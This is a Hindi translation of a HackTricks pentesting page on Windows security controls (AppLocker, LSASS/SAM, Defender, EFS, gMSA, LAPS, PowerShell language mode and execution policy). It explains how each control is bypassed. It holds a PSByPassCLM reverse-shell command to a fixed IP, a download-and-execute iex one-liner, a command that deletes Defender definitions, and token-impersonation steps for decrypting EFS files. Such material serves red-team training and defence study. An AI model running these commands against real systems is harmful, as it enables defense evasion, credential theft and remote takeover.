# Windows सुरक्षा नियंत्रण
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! HackTricks का समर्थन करने के अन्य तरीके: * यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** का अनुसरण करें.** * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics\&utm_medium=banner\&utm_source=hacktricks) का उपयोग करके दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित **वर्कफ्लो को आसानी से बनाएं और स्वचालित करें**।\ आज ही एक्सेस प्राप्त करें: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## AppLocker नीति एप्लिकेशन व्हाइटलिस्ट एक प्रकार की सूची होती है जिसमें अनुमोदित सॉफ्टवेयर एप्लिकेशन या एक्जीक्यूटेबल्स होते हैं जिन्हें सिस्टम पर मौजूद होने और चलाने की अनुमति होती है। इसका उद्देश्य हानिकारक मैलवेयर और अनुमोदित नहीं किए गए सॉफ्टवेयर से पर्यावरण की रक्षा करना है जो संगठन की विशिष्ट व्यावसायिक जरूरतों के अनुरूप नहीं है। [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) Microsoft का **एप्लिकेशन व्हाइटलिस्टिंग समाधान** है और यह सिस्टम प्रशासकों को नियंत्रण प्रदान करता है **कि उपयोगकर्ता कौन से एप्लिकेशन और फाइलें चला सकते हैं**। यह एक्जीक्यूटेबल्स, स्क्रिप्ट्स, Windows इंस्टॉलर फाइल्स, DLLs, पैकेज्ड एप्स, और पैक्ड एप इंस्टॉलर्स पर **विस्तृत नियंत्रण** प्रदान करता है।\ यह आम है कि संगठन **cmd.exe और PowerShell.exe को ब्लॉक करते हैं** और कुछ डायरेक्टरीज में लिखने की अनुमति नहीं देते हैं, **लेकिन यह सब बाईपास किया जा सकता है**। ### जांच जांचें कि कौन सी फाइलें/एक्सटेंशन ब्लैकलिस्टेड/व्हाइटलिस्टेड हैं: ```powershell Get-ApplockerPolicy -Effective -xml Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections $a = Get-ApplockerPolicy -effective $a.rulecollections ``` ### बायपास * AppLocker नीति को बायपास करने के लिए उपयोगी **लिखने योग्य फ़ोल्डर**: यदि AppLocker `C:\Windows\System32` या `C:\Windows` के अंदर कुछ भी निष्पादित करने की अनुमति दे रहा है, तो वहाँ **लिखने योग्य फ़ोल्डर** हैं जिनका उपयोग आप **इसे बायपास करने** के लिए कर सकते हैं। ``` C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\drivers\color C:\Windows\Tasks C:\windows\tracing ``` * आमतौर पर **विश्वसनीय** [**"LOLBAS's"**](https://lolbas-project.github.io/) बाइनरीज़ भी AppLocker को बायपास करने के लिए उपयोगी हो सकती हैं। * **खराब लिखे गए नियमों को भी बायपास किया जा सकता है** * उदाहरण के लिए, **``**, आप कहीं भी **`allowed` नामक फोल्डर बना सकते हैं** और यह अनुमति दी जाएगी। * संगठन अक्सर **`%System32%\WindowsPowerShell\v1.0\powershell.exe` एक्जीक्यूटेबल को ब्लॉक करने पर ध्यान केंद्रित करते हैं**, लेकिन अन्य [**PowerShell एक्जीक्यूटेबल स्थानों**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) जैसे `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` या `PowerShell_ISE.exe` के बारे में भूल जाते हैं। * **DLL प्रवर्तन बहुत कम सक्षम किया जाता है** क्योंकि यह एक सिस्टम पर अतिरिक्त भार डाल सकता है, और यह सुनिश्चित करने के लिए कि कुछ भी टूटेगा नहीं, इसके लिए बहुत सारी परीक्षण की आवश्यकता होती है। इसलिए **DLLs का उपयोग बैकडोर के रूप में करने से AppLocker को बायपास करने में मदद मिलेगी**। * आप [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) या [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) का उपयोग करके किसी भी प्रक्रिया में **Powershell** कोड को **निष्पादित कर सकते हैं** और AppLocker को बायपास कर सकते हैं। अधिक जानकारी के लिए देखें: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)। ## प्रमाणीकरण संग्रहण ### सुरक्षा खाते प्रबंधक (SAM) स्थानीय प्रमाणीकरण इस फाइल में मौजूद हैं, पासवर्ड हैश किए गए हैं। ### स्थानीय सुरक्षा प्राधिकरण (LSA) - LSASS **प्रमाणीकरण** (हैश) इस उपप्रणाली की **मेमोरी** में **सहेजे गए** हैं एकल साइन-ऑन कारणों के लिए।\ **LSA** स्थानीय **सुरक्षा नीति** (पासवर्ड नीति, उपयोगकर्ता अनुमतियाँ...), **प्रमाणीकरण**, **एक्सेस टोकन**... का प्रबंधन करता है।\ LSA वह होगा जो **SAM** फाइल के अंदर प्रदान किए गए प्रमाणीकरण की **जांच** करेगा (स्थानीय लॉगिन के लिए) और डोमेन उपयोगकर्ता को प्रमाणित करने के लिए **डोमेन कंट्रोलर** से **बात** करेगा। **प्रमाणीकरण** **प्रक्रिया LSASS** के अंदर **सहेजे गए** हैं: Kerberos टिकट, हैश NT और LM, आसानी से डिक्रिप्ट किए गए पासवर्ड। ### LSA सीक्रेट्स LSA कुछ प्रमाणीकरण को डिस्क में सहेज सकता है: * एक्टिव डायरेक्टरी के कंप्यूटर खाते का पासवर्ड (पहुँच से बाहर डोमेन कंट्रोलर)। * विंडोज सेवाओं के खातों के पासवर्ड * निर्धारित कार्यों के लिए पासवर्ड * और अधिक (IIS अनुप्रयोगों का पासवर्ड...) ### NTDS.dit यह एक्टिव डायरेक्टरी का डेटाबेस है। यह केवल डोमेन कंट्रोलर्स में मौजूद है। ## डिफेंडर [**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender) \*\*\*\* एक एंटीवायरस है जो Windows 10 और Windows 11 में, और Windows Server के संस्करणों में उपलब्ध है। यह **`WinPEAS`** जैसे सामान्य पेंटेस्टिंग टूल्स को **ब्लॉक** करता है। हालांकि, इन सुरक्षाओं को **बायपास करने के तरीके** हैं। ### जांच **Defender** की **स्थिति** की जांच करने के लिए आप PS cmdlet **`Get-MpComputerStatus`** को निष्पादित कर सकते हैं (यह जानने के लिए कि यह सक्रिय है या नहीं, **`RealTimeProtectionEnabled`** के मान की जांच करें):
PS C:\> Get-MpComputerStatus

[...]
AntispywareEnabled              : True
AntispywareSignatureAge         : 1
AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
AntispywareSignatureVersion     : 1.323.392.0
AntivirusEnabled                : True
[...]
NISEnabled                      : False
NISEngineVersion                : 0.0.0.0
[...]
RealTimeProtectionEnabled       : True
RealTimeScanDirection           : 0
PSComputerName                  :
इसे सूचीबद्ध करने के लिए आप यह भी चला सकते हैं: ```bash WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List wmic /namespace:\\root\securitycenter2 path antivirusproduct sc query windefend #Delete all rules of Defender (useful for machines without internet access) "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` ## EFS (एन्क्रिप्टेड फाइल सिस्टम) EFS एक फाइल को एक **सममित कुंजी** से एन्क्रिप्ट करके काम करता है, जिसे फाइल एन्क्रिप्शन की, या **FEK** के नाम से जाना जाता है। FEK को फिर उस **सार्वजनिक कुंजी** से **एन्क्रिप्ट** किया जाता है जो उस उपयोगकर्ता से जुड़ी होती है जिसने फाइल को एन्क्रिप्ट किया है, और यह एन्क्रिप्टेड FEK को $EFS **वैकल्पिक डेटा स्ट्रीम** में संग्रहीत किया जाता है। फाइल को डिक्रिप्ट करने के लिए, EFS कंपोनेंट ड्राइवर $EFS स्ट्रीम में संग्रहीत सममित कुंजी को डिक्रिप्ट करने के लिए EFS डिजिटल प्रमाणपत्र (जिसका उपयोग फाइल को एन्क्रिप्ट करने के लिए किया गया था) से मेल खाने वाली **निजी कुंजी** का उपयोग करता है। [यहाँ](https://en.wikipedia.org/wiki/Encrypting_File_System) से। उदाहरण जब फाइलें बिना उपयोगकर्ता के अनुरोध के डिक्रिप्ट हो जाती हैं: * फाइलें और फोल्डर्स को [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table) जैसे अन्य फाइल सिस्टम के साथ फॉर्मेट किए गए वॉल्यूम में कॉपी करने से पहले डिक्रिप्ट किया जाता है। * एन्क्रिप्टेड फाइलें जब SMB/CIFS प्रोटोकॉल का उपयोग करके नेटवर्क पर कॉपी की जाती हैं, तो फाइलें नेटवर्क पर भेजे जाने से पहले डिक्रिप्ट की जाती हैं। इस विधि से एन्क्रिप्टेड फाइलों को **मालिक उपयोगकर्ता द्वारा पारदर्शी रूप से एक्सेस किया जा सकता है** (जिसने उन्हें एन्क्रिप्ट किया है), इसलिए अगर आप **उस उपयोगकर्ता बन सकते हैं** तो आप फाइलों को डिक्रिप्ट कर सकते हैं (उपयोगकर्ता का पासवर्ड बदलना और उसके रूप में लॉगिन करना काम नहीं करेगा)। ### EFS जानकारी जांचें यह जांचें कि क्या कोई **उपयोगकर्ता** ने इस **सेवा** का **उपयोग किया** है यह पथ मौजूद है या नहीं: `C:\users\\appdata\roaming\Microsoft\Protect` जांचें **किसके पास** फाइल तक **पहुंच** है cipher /c \\ आप `cipher /e` और `cipher /d` का उपयोग भी एक फोल्डर के अंदर सभी फाइलों को **एन्क्रिप्ट** और **डिक्रिप्ट** करने के लिए कर सकते हैं। ### EFS फाइलों को डिक्रिप्ट करना #### अधिकार प्रणाली होना इस तरीके की आवश्यकता है कि **पीड़ित उपयोगकर्ता** होस्ट के अंदर एक **प्रक्रिया** **चला** रहा हो। अगर ऐसा है, तो `meterpreter` सत्र का उपयोग करके आप उपयोगकर्ता की प्रक्रिया के टोकन की नकल कर सकते हैं (`impersonate_token` `incognito` से)। या आप सिर्फ उपयोगकर्ता की प्रक्रिया में `migrate` कर सकते हैं। #### उपयोगकर्ता का पासवर्ड जानना {% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} ## Group Managed Service Accounts (gMSA) अधिकांश इंफ्रास्ट्रक्चर में, सेवा खाते सामान्य उपयोगकर्ता खाते होते हैं जिनमें “**पासवर्ड कभी समाप्त नहीं होता**” विकल्प होता है। इन खातों का प्रबंधन एक वास्तविक समस्या हो सकती है और इसीलिए Microsoft ने **Managed Service Accounts** पेश किए: * अब पासवर्ड प्रबंधन की जरूरत नहीं है। यह एक जटिल, यादृच्छिक, 240-अक्षर का पासवर्ड का उपयोग करता है और जब डोमेन या कंप्यूटर पासवर्ड समाप्ति तिथि तक पहुंचता है तो उसे स्वचालित रूप से बदल देता है। * यह Microsoft Key Distribution Service (KDC) का उपयोग करके gMSA के लिए पासवर्ड बनाने और प्रबंधित करने के लिए करता है। * इसे लॉक आउट नहीं किया जा सकता या इंटरएक्टिव लॉगिन के लिए उपयोग नहीं किया जा सकता * कई होस्टों के बीच साझा करने का समर्थन करता है * शेड्यूल किए गए कार्यों को चलाने के लिए उपयोग किया जा सकता है (Managed service accounts शेड्यूल किए गए कार्यों को चलाने का समर्थन नहीं करते) * सरलीकृत SPN प्रबंधन – सिस्टम स्वचालित रूप से SPN मान को बदल देगा अगर कंप्यूटर के **sAMaccount** विवरण या DNS नाम संपत्ति बदल जाती है। gMSA खातों के पासवर्ड _**msDS-ManagedPassword**_ नामक LDAP प्रॉपर्टी में संग्रहीत होते हैं जो DC’s द्वारा हर 30 दिनों में **स्वचालित रूप से रीसेट** हो जाते हैं, **अधिकृत प्रशासकों** और उन सर्वरों द्वारा **प्राप्त किए जा सकते हैं** जिन पर वे स्थापित हैं। _**msDS-ManagedPassword**_ एक एन्क्रिप्टेड डेटा ब्लॉब है जिसे [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) कहा जाता है और यह केवल तभी प्राप्त किया जा सकता है जब कनेक्शन सुरक्षित हो, **LDAPS** या जब प्रमाणीकरण प्रकार 'Sealing & Secure' हो, उदाहरण के लिए। ![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../.gitbook/assets/asd1.png) तो, अगर gMSA का उपयोग किया जा रहा है, तो जांचें कि क्या इसमें **विशेष अधिकार** हैं और यह भी जांचें कि क्या आपके पास सेवाओं के पासवर्ड को **पढ़ने** की **अनुमति** है। आप इस पासवर्ड को [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader) के साथ पढ़ सकते हैं: ``` /GMSAPasswordReader --AccountName jkohler ``` इस [वेब पेज](https://cube0x0.github.io/Relaying-for-gMSA/) को भी देखें जो बताता है कि कैसे **NTLM relay attack** का प्रयोग करके **gMSA** का **पासवर्ड** **पढ़ा** जा सकता है। ## LAPS [**Local Administrator Password Solution (LAPS)**](https://www.microsoft.com/en-us/download/details.aspx?id=46899) आपको डोमेन-जुड़े कंप्यूटरों पर स्थानीय एडमिनिस्ट्रेटर का पासवर्ड (**यादृच्छिक**, अद्वितीय और नियमित रूप से **बदला जाने वाला**) **प्रबंधित करने** की अनुमति देता है। ये पासवर्ड केंद्रीय रूप से Active Directory में संग्रहीत किए जाते हैं और ACLs का उपयोग करके अधिकृत उपयोगकर्ताओं तक सीमित होते हैं। यदि आपके उपयोगकर्ता को पर्याप्त अनुमतियां दी गई हैं तो आप स्थानीय एडमिन्स के पासवर्ड पढ़ सकते हैं। {% content-ref url="active-directory-methodology/laps.md" %} [laps.md](active-directory-methodology/laps.md) {% endcontent-ref %} ## PS Constrained Language Mode PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) कई ऐसी सुविधाओं को **सीमित कर देता है** जो PowerShell का प्रभावी ढंग से उपयोग करने के लिए आवश्यक हैं, जैसे कि COM ऑब्जेक्ट्स को ब्लॉक करना, केवल अनुमोदित .NET प्रकारों की अनुमति देना, XAML-आधारित वर्कफ्लोज़, PowerShell क्लासेस, और अधिक। ### **जांचें** ```powershell $ExecutionContext.SessionState.LanguageMode #Values could be: FullLanguage or ConstrainedLanguage ``` ### बायपास ```powershell #Easy bypass Powershell -version 2 ``` वर्तमान Windows में वह Bypass काम नहीं करेगा लेकिन आप [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM) का उपयोग कर सकते हैं।\ **इसे कंपाइल करने के लिए आपको जरूरत पड़ सकती है** _**संदर्भ जोड़ें**_ -> _ब्राउज़ करें_ -> _ब्राउज़ करें_ -> `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` जोड़ें और **प्रोजेक्ट को .Net4.5 में बदलें**। #### सीधा बायपास: ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe ``` #### रिवर्स शेल: ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe ``` आप [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) या [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) का उपयोग करके किसी भी प्रक्रिया में **Powershell** कोड को निष्पादित कर सकते हैं और संयमित मोड को बायपास कर सकते हैं। अधिक जानकारी के लिए देखें: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). ## PS निष्पादन नीति डिफ़ॉल्ट रूप से यह **प्रतिबंधित** पर सेट होती है। इस नीति को बायपास करने के मुख्य तरीके: ```powershell 1º Just copy and paste inside the interactive PS console 2º Read en Exec Get-Content .runme.ps1 | PowerShell.exe -noprofile - 3º Read and Exec Get-Content .runme.ps1 | Invoke-Expression 4º Use other execution policy PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 5º Change users execution policy Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted 6º Change execution policy for this session Set-ExecutionPolicy Bypass -Scope Process 7º Download and execute: powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')" 8º Use command switch Powershell -command "Write-Host 'My voice is my passport, verify me.'" 9º Use EncodeCommand $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand ``` और जानकारी [यहाँ](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) पाई जा सकती है। ## सिक्योरिटी सपोर्ट प्रोवाइडर इंटरफेस (SSPI) यह एक API है जिसका उपयोग उपयोगकर्ताओं को प्रमाणित करने के लिए किया जा सकता है। SSPI दो मशीनों के बीच संवाद करने के लिए उपयुक्त प्रोटोकॉल खोजने का काम करेगा। इसके लिए पसंदीदा विधि Kerberos है। फिर SSPI यह तय करेगा कि कौन सा प्रमाणीकरण प्रोटोकॉल इस्तेमाल किया जाएगा, इन प्रमाणीकरण प्रोटोकॉलों को सिक्योरिटी सपोर्ट प्रोवाइडर (SSP) कहा जाता है, ये प्रत्येक Windows मशीन के अंदर DLL के रूप में स्थित होते हैं और दोनों मशीनों को संवाद करने के लिए एक ही SSP का समर्थन करना चाहिए। ### मुख्य SSPs * **Kerberos**: पसंदीदा विधि * %windir%\Windows\System32\kerberos.dll * **NTLMv1** और **NTLMv2**: संगतता के लिए * %windir%\Windows\System32\msv1\_0.dll * **Digest**: वेब सर्वर और LDAP, पासवर्ड MD5 हैश के रूप में * %windir%\Windows\System32\Wdigest.dll * **Schannel**: SSL और TLS * %windir%\Windows\System32\Schannel.dll * **Negotiate**: इसका उपयोग प्रोटोकॉल (Kerberos या NTLM, Kerberos डिफ़ॉल्ट होने के नाते) को तय करने के लिए किया जाता है * %windir%\Windows\System32\lsasrv.dll #### बातचीत में कई विधियाँ या केवल एक ही पेश की जा सकती है। ## UAC - यूजर अकाउंट कंट्रोल [यूजर अकाउंट कंट्रोल (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) एक ऐसी सुविधा है जो **उच्च स्तरीय गतिविधियों के लिए सहमति प्रॉम्प्ट** सक्षम करती है। {% content-ref url="windows-security-controls/uac-user-account-control.md" %} [uac-user-account-control.md](windows-security-controls/uac-user-account-control.md) {% endcontent-ref %}
\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करके आसानी से **वर्कफ्लोज़ का निर्माण और ऑटोमेशन** करें, जो दुनिया के **सबसे उन्नत** समुदाय टूल्स द्वारा संचालित होते हैं।\ आज ही पहुँच प्राप्त करें: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert)! HackTricks का समर्थन करने के अन्य तरीके: * यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में **शामिल हों** या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।